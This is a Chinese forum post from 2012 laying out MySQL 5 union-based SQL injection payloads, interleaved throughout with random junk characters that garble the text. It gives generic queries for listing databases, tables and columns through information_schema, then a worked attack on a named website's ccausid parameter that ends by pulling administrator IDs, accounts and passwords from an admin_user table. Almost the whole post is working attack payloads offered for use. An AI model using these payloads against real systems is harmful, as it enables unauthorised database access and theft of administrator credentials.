查库
$ g) ~8 |+ d8 Y+ M: j
. \3 z: K4 w- Aid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*6 Q p* m% W# A6 i9 e% V
3 _0 `& b* C- L, k4 j% S7 W! o
查表, @0 b3 U; B }$ z+ ^0 ?
. v1 Y2 `! G- H$ L( D/ r3 V+ J: Z
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
6 s; ^; U8 I( x) T; u* ^
8 Z3 @1 U5 T4 P7 F# D0 f& i查段
7 |, a3 ~4 \% d/ r: ?7 M6 @% Z! q( }/ K/ K$ F. b
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,10 q3 w9 }4 x B' k. m+ c! D. a
+ g6 D& p' X% k {# K0 P
; s1 _+ R/ k. Fmysql5高级注入方法暴表
3 c9 q S1 m) T" U, `# \- A4 s! y' {, q! O% \
例子如下:
) p4 N0 N. ]( }& R5 g/ F# G! o4 r- b% k0 Z4 Y+ {2 D
1.爆表
! S% b% ?( N2 @, D1 `- ]http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)9 w0 G' m1 C W F7 r: [# S
这样爆到第4个时出现了admin_user表。
3 j- P& P! d' i) Z9 B' A- H$ F: X M& n# V9 F) I( }
2.暴字段
1 X6 n9 U$ z# ~4 e! H; G" \- vhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*2 R+ B) B& R/ w( X& \# G( `: K
' ]1 J9 b! b# A2 G m
- P4 N) ?% [& `: e2 @* J3.爆密码" r7 g" a' M# i0 Q
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* ; T W, h" q* k! v
* b( K" K3 N6 r/ @. Q+ Z+ L" o
- R0 o3 O& Z. | R |
发表于 2012-9-13 16:29:37
收藏
支持
反对